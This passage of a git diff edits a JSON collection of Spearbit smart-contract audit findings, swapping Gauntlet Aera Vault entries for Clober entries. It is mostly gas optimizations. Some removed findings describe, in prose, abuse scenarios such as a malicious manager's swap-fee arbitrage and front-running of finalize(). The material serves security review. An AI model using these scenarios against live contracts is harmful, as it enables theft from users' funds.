64;", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Malicious manager could cause Vault funds to be inaccessible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The calculateAndDistributeManagerFees() function pushes tokens to the manager and if for unknown reasons this action fails the entire Vault would be blocked and funds become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore final- ize() as well. Within calculateAndDistributeManagerFees() the function safeTransfer() is the riskiest and could fail under the following situations: A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly. A token with a blacklist option is used and the manager is blacklisted. For example USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exist that he is malicious and his address could be blacklisted in USDC. Note: set as high risk because although probability is very small, impact results in Vault funds to become inacces- sible. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < amounts.length; i++) { tokens[i].safeTransfer(manager, amounts[i]); } }", + "title": "using block.chainid for create2 salt can be problematic if there's chain hardfork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Using block.chainid as salt for create2 can result in inconsistency if there is a chain split event(eg. eth2 merge). This will make 2 different chains that has different chainid(one with original chain id and one with random new value). Which will result in making one of the chains not able to interact with markets, nfts properly. Also, it will make things hard to do a fork testing which changes chainid for local environment.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "updateWeightsGradually allows change rates to start in the past with a very high maximumRatio", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current updateWeightsGradually is using startTime instead of time that should be Math.max(block.timestamp, startTime). Because internally Balancer will use startTime = Math.max(currentTime, startTime); as the startTime, this allows to: the minimal start Have a startTime in the past. Have a targetWeights[i] higher than allowed. We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check it is still needed in the Aera implementation to prevent transactions to revert because of an underflow error on uint256 duration = endTime - startTime;", + "title": "Use get64Unsafe() when updating claimable in take()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "get64Unsafe() can be used when fetching the stored claimable value since _getClaimableIndex() returns elementIndex < 4", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "The vault manager has unchecked power to create arbitrage using setSwapFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "A previously known issue was that a malicious vault manager could arbitrage the vault like in the below scenario: 1. Set the swap fees to a high value by setSwapFee (10% is the maximum). 2. Wait for the market price to move against the spot price. 3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault. The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_- PERCENT_CHANGE each time. However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want.", + "title": "Check is zero is cheaper than check if the result is a concrete value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Checking if the result is zero vs. checking if the result is/isn't a concrete value should save 1 opcode.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Implement a function to claim liquidity mining rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer offers a liquidity mining rewards distribution for liquidity providers. Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquid- ity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances which are stored in a Merkle tree. Claim- ing through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards, and when claiming multiple tokens. The AeraVault is itself the only liquidity provider of the Balancer pool deployed, so each week its entitled to claim those rewards. Currently, those rewards cannot be claimed because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever.", + "title": "Function argument can be skipped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The address caller parameter in the internal _cancel function can be replaced with msg.sender as effectively this is the value that is actually used when the function is invoked.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Owner can circumvent allowance() via enableTradingWithWeights()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The vault Owner can set arbitrary weights via disableTrading() and then call enableTrading- WithWeights() to set the spot price and create arbitrage opportunities for himself. This way allowance() in withdraw() checks, which limit the amount of funds an owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time. Also see the following issues: allowance() doesnt limit withdraw()s enableTradingWithWeights allow the Treasury to change the pools weights even if the swap is not disabled Separation of concerns Owner and Manager function disableTrading() ... onlyOwnerOrManager ... { setSwapEnabled(false); } function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... { ... pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); } function enableTradingRiskingArbitrage() ... onlyOwner ... { setSwapEnabled(true); } 13", + "title": "Redundant flash loan balance cap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The requested flash loan amounts are checked against and capped up to the contract's token bal- ances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens. Otherwise, let the function revert from failure to transfer the requested tokens instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Front-running attacks on finalize could affect received token amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce the minimum amount of received tokens. Without such check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows: 1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that WETH and DAI weights are both 0.5. 2. An attacker front-runs the Treasurys transaction and swaps in 3000 DAI to get 0.5 WETH from the pool. 3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI. Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such trade (e.g., if a timelock controls it). Notice that the attacker may not profit from the swap because of slippage but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury.", + "title": "Do direct assignment to totalBaseAmount and totalQuoteAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and as- signed a value each iteration. Since they are only incremented in the referenced block (and are mutually exclusive cases), the assignment can be direct instead of doing an increment.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "safeApprove in depositToken could revert for non-standard token like USDT", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Some non-standard tokens like USDT will revert when a contract or a user tries to approve an al- lowance when the spender allowance has already been set to a non zero value. In the current code we have not seen any real problem with this fact because the amount retrieved via depositToken() is approved send to the Balancer pool via joinPool() and managePoolBalance(). Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unfore- seen situation) then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits. Note: Set to medium risk because the probability of this happening is low but impact would be high. We also should note that OpenZeppelin has officially deprecated the safeApprove function, suggesting to use instead safeIncreaseAllowance and safeDecreaseAllowance.", + "title": "Redundant zero minusFee setter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "minusFee defaults to zero, so the explicit setting of it is redundant.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" - ] - }, - { - "title": "Consult with Balancer team about best approach to add and remove funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault uses AssetManagers functionality of function managePoolBalance() to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to future unexpected behavior. Additionally, this disables the capacity to implement the original intention of AssetManagers functionality, e.g. storing funds elsewhere to generate yield.", - "labels": [ - "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Fee on transfer can block several functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Some tokens have a fee on transfer, for example USDT. Usually such fee is not enabled but could be re-enabled at any time. With this fee enabled the withdrawFromPool() function would receive slightly less tokens than the amounts requested from Balancer causing the next safeTransfer() call to fail because there are not enough tokens inside the contract. This means withdraw() calls will fail. Functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code. Note: The function returnFunds() is more robust and can handle this problem. Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium. function withdraw(uint256[] calldata amounts) ... { ... withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { tokens[i].safeTransfer(owner(), amounts[i]); // could revert it the full amounts[i] isn't ,! available ... } ... } }", + "title": "Load _FEE_PRECISION into local variable before usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Loading _FEE_PRECISION into a local variable slightly reduced bytecode size (0.017kB) and was found to be a tad more gas efficient.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "enableTradingWithWeights allow the Treasury to change the pools weights even if the swap is not disabled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights. The function does not verify if the pools swap feature is enabled and for this reason, as a result, it allows the Treasury to act as the manager who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pools swap is disabled.", + "title": "Can cache value difference in SegmentedSegmentTree464.update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The replaced - value expression in SegmentedSegmentTree464.pop is recomputed several times in each loop iteration.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "AeraVault constructor is not checking all the input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault constructor has the role to handle Balancers ManagedPool deployment. The con- structor should increase the number of user input validation and the Gauntlet team should be aware of the possible edge case that could happen given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We are going to list all the worst-case scenarios that could happen given the premise that the deployments are handled by the Treasury. 1. factory could be a wrapper contract that will deploy a ManagedPool. This would mean that the deployer could pass correct parameters to Aera Vault to pass these checks, but will use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool. 2. swapFeePercentage value is not checked. On Balancer, the deployment will revert if the value is not in- side this range >= 1e12 (0.0001%) and <= 1e17 (10% - this fits in 64 bits). Without any check, the Gauntlet accept to follow the Balancers swap requirements. 3. manager_ is not checked. They could set the manager as the Treasury (owner of the vault) itself. This would give the Treasury the full power to manage the Vault. At least these values should be checked: address(0), address(this) or owner(). The same checks should also be done in the setManager() function. 4. validator_ could be set to a custom contract that will give full allowances to the Treasury. This would make the withdraw() act like finalize() allowing to withdraw all the funds from the vault/pool. 17 5. noticePeriod_ has only a max value check. Gauntlet team explained that a time delay between the ini- tialization of the finalize process and the actual finalize is needed to prevent the Treasury to be able to instantly withdraw all the funds. Not having a min value check allow the Treasury to set the value to 0 so there would be no delay between the initiateFinalization() and finalize() because noticeTimeoutAt == block.timestamp. 6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager because the managerFeeIndex would always be 0. 7. description_ can be empty. From the Specification PDF, the description of the vault has the role to De- scribes vault purpose and modelling assumptions for differentiating between vaults. Being empty could lead to a bad UX for external services that needs to differentiate different vaults. These are all the checks that are done directly by Balancer during deployment via the Pool Factory: BasePool constructor#L94-L95 min and max number of tokens. BasePool constructor#L102token array is sorted following Balancer specification (sorted by token address). BasePool constructor calling _setSwapFeePercentage min and max value for swapFeePercentage. BasePool constructor calling vault.registerTokens token address uniqueness (cant have same Following the pathBasePool is calling from function _registerMinimalSwapInfoPoolTokens it also checks that token != IERC20(0). should that call token in the pool), vault.registerTokens MinimalSwapInfoPoolsBalance. ManagedPool constructor calling _startGradualWeightChange Check min value of weight and that the total sum of the weights are equal to 100%. _startGradualWeightChange internally check that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE.", + "title": "Unnecessary loop condition in pop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason why it still terminates is that the first layer only has group index 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and then it terminates with the break keyword.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Possible mismatch between Validator.count and AeraVault assets count", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "A weak connection between WithdrawalValidator and Aera Vault could lead to the inability of withdrawing from a Vault. Consider the following scenario: The Validator is deployed with a tokenCount < than Vault.getTokens().length. Inside the withdraw() function we reference the following code block: uint256[] memory allowances = validator.allowance(); uint256[] memory weights = getNormalizedWeights(); uint256[] memory newWeights = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable( address(tokens[i]), amounts[i], holdings[i].min(allowances[i]) ); } } A scenario where allowances.length < tokens.length would cause this function to revert with an Index out of bounds error. The only way for the Treasury to withdraw funds would be via the finalize() method which has a time delay.", + "title": "Use same comparisons for children in heap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The pop function compares one child with a strict inequality (<) and the other with less than or equals (<=). A heap doesn't guarantee order between the children and there are no duplicate nodes (wordIndexes).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Medium Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Ensure vaults deployment integrity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The treasury could deploy on purpose or by accident a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by parties taking on Manager responsibilities (e.g. usually Gauntlet will be involved here).", + "title": "No need for explicit assignment with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Explicitly assigning ZERO value (or any default value) costs gas, but is not needed.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Frequent calling of calculateAndDistributeManagerFees() lowers fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently his fees will be lower. For example: If he calls it twice, while both time getting 1%, he actually gets: 1% + 1% * (100% - 1%) = 1.99% If he waits longer until he has earned 2%, he actually gets: 2%, which is slightly more than 1.99% If called very frequently the fees go to 0 (especially taking in account the rounding down). However the gas cost would be very high. The Manager can (accidentally) do this by calling claimManagerFees(). The Owner can (accidentally or on pur- pose (e.g. using 0 balance change) ) do this by calling deposit(), withdraw() or setManager(). Note: Rounding errors make this slightly worse. Also see the following issue: Possible rounding down of fees function claimManagerFees() ... { calculateAndDistributeManagerFees(); // get a percentage of the Pool }", + "title": "Prefix increment is more efficient than postfix increment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The prefix increment reduces bytecode size by a little, and is slightly more gas efficient.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "OpenZeppelin best practices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Aera Vault uses OpenZeppelin release 4.3.2 which is copied into their github. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths. This has the risk of making a mistake in the process. import \"./dependencies/openzeppelin/SafeERC20.sol\"; import \"./dependencies/openzeppelin/IERC20.sol\"; import \"./dependencies/openzeppelin/IERC165.sol\"; import \"./dependencies/openzeppelin/Ownable.sol\"; import \"./dependencies/openzeppelin/ReentrancyGuard.sol\"; import \"./dependencies/openzeppelin/Math.sol\"; import \"./dependencies/openzeppelin/SafeCast.sol\"; import \"./dependencies/openzeppelin/ERC165Checker.sol\";", + "title": "Tree update can be avoided for fully filled orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped since the new value is the same as the old value. Hence, the code block can be moved inside the if (remainingAmount > 0) code block.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Possible rounding down of fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "If certain token has a few decimals numbers then fees could be rounded down to 0, especially if time between calculateAndDistributeManagerFees() is relatively small. This also could slightly shift the spot price because the balance of one coin is lowered while the other remains still. With fewer decimals the situation worsens, e.g. Gemini USD GUSD has 2 decimals, therefore the problem occurs with a balance of 10_000 GUSD. Note: The rounding down is probably neglectable in most cases. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < tokens.length; i++) { amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0 } ... } With 1 USDC in the vault and 2 hours between calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0. This behavior is demonstrated in the following POC: 21 import \"hardhat/console.sol\"; contract testcontract { uint256 constant ONE = 10**18; uint managementFee = 10**8; constructor() { // MAX_MANAGEMENT_FEE = 10**9; // 1 USDC uint holdings = 1E6; uint delay = 2 hours; uint managerFeeIndex = delay * managementFee; uint amounts = (holdings * managerFeeIndex) / ONE; console.log(\"Fee\",amounts); // fee is 0 } }", + "title": "Shift msg.value cap check for earlier revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The cap check on msg.value should be shifted up to the top of the function so that failed checks will revert earlier, saving gas in these cases.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The initiateFinalization() function is missing a nonReentrant modifier while calculateAnd- DistributeManagerFees() executes external calls. Same goes for setManager() and claimManagerFees() func- tions.", + "title": "Solmate's ReentrancyGuard is more efficient than OpenZeppelin's", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Potential division by 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "If the balance (e.g. holdings[]) of a token is 0 in deposit() then the dividing by holdings[] would cause a revert. Note: Function withdraw() has similar code but when holdings[]==0 its not possible to withdraw() anyway. Note: The current Mannon vault code will not allow the balances to be 0. Note: Although not used in the current code, in order to do a deregisterTokens(), Balancer requires the balance to be 0. Additionally, refer to the following Balancer documentation about the-vault#deregistertokens. The worst case scenario is deposit() not working. function deposit(uint256[] calldata amounts) ... { ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { depositToken(tokens[i], amounts[i]); uint256 newBalance = holdings[i] + amounts[i]; newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0 } ... ... } Similar divisions by 0 could occur in getWeightChangeRatio(). The function is called from updateWeightsGradu- ally(). If this is due to targetWeight being 0, then it is the desired result. Current weight should not be 0 due balancer checks. function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... { return weight > targetWeight ? (ONE * weight) / targetWeight : (ONE * targetWeight) / weight; // could revert if targetWeight == 0 // could revert if weight== 0 }", + "title": "r * r is more gas efficient than r ** 2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Currently the Aera Vault is using BaseManagedPoolFactory as the factory to deploy the Balancer pool while Balancers documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory: This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner. 23", + "title": "Update childHeapIndex and shifter initial values to constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The initial values of childHeapIndex and shifter can be better hardcoded to avoid redundant operations.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Adopt the two-step ownership transfer pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effec- tively breaking vault critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to revert the transaction every time. However, the transferOwnership() function may also lead to the same issue if the ownership is transferred to an uncontrollable address because of human errors or attacks on the Treasury.", + "title": "Same value tree update falls under else case which will do redundant overflow check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "In the case where value and replaced are equal, it currently will fall under the else case which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Implement zero-address check for manager_", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Non-existent zero-address checks inside the constuctor for the manager_ parameter. If manager_- becomes a zero address then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)).", + "title": "Unchecked code blocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The mentioned code blocks can be performed without native math overflow / underflow checks because they have been checked to be so, or the min / max range ensures it.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Low Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Simplify tracking of managerFeeIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage vari- ables (e.g. costing SLOAD/SSTORE). However, because managementFee is immutable this can be simplified to one storage variable, saving gas and improving code legibility. uint256 public immutable managementFee; // can't be changed function calculateAndDistributeManagerFees() internal { updateManagerFeeIndex(); ... if (managerFeeIndex == 0) { return; use managerFeeIndex } ... // ... managerFeeIndex = 0; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; lastFeeCheckpoint = block.timestamp.toUint64(); }", + "title": "Unused Custom Error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "error TreeQueryIndexOrder(); is defined but unused.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Gas Optimization" ] }, { - "title": "Directly call getTokensData() from returnFunds()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokens- Data() thus waste gas unnecessarily. function returnFunds() internal returns (uint256[] memory amounts) { uint256[] memory holdings = getHoldings(); IERC20[] memory tokens = getTokens(); ... } function getHoldings() public view override returns (uint256[] memory amounts) { (, amounts, ) = getTokensData(); } function getTokens() public view override returns (IERC20[] memory tokens) { (tokens, , ) = getTokensData(); }", + "title": "Markets with malicious tokens should not be interacted with", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious and interacting with these markets can lead to loss of funds in several ways. For example, a token with custom code / a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time using their WETH approval of the router.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Change uint32 and uint64 to uint256", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The contract contains a few variables/constants that are smaller than uint256: noticePeriod, no- ticeTimeoutAt and lastFeeCheckpoint. This doesnt actually save gas because they are not part of a struct and still take up a storage slot. It even costs more gas because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function. If that would happen, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using int256 simplifies the code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { ... uint32 public immutable noticePeriod; ... uint64 public noticeTimeoutAt; ... uint64 public lastFeeCheckpoint = type(uint64).max; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; // could get large when lastFeeCheckpoint wraps lastFeeCheckpoint = block.timestamp.toUint64(); }", + "title": "Claim bounty of stale orders should be given to user instead of daoTreasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury. However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to him instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Use block.timestamp directly instead of assigning it to a temporary variable.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "It is preferable to use block.timestamp directly in your code instead of assigning it to a temporary variable as it only uses 2 gas.", + "title": "Misleading comment on remainingRequestedRawAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base / quote amounts are converted to the raw amount.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and ex- ternal calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current implementation of Aera Vault always calls pool.getPoolId() or indirectly getPoolId() to retrieve the ID of the immutable state variable pool that has been declared at constructor time. The pool.getPoolId() is a getter function defined in the Balancer BasePool contract: function getPoolId() public view override returns (bytes32) { return _poolId; } Inside the same BasePool contract the _poolId is defined as immutable which means that after creating a pool it will never change. For this reason it is possible to apply the same logic 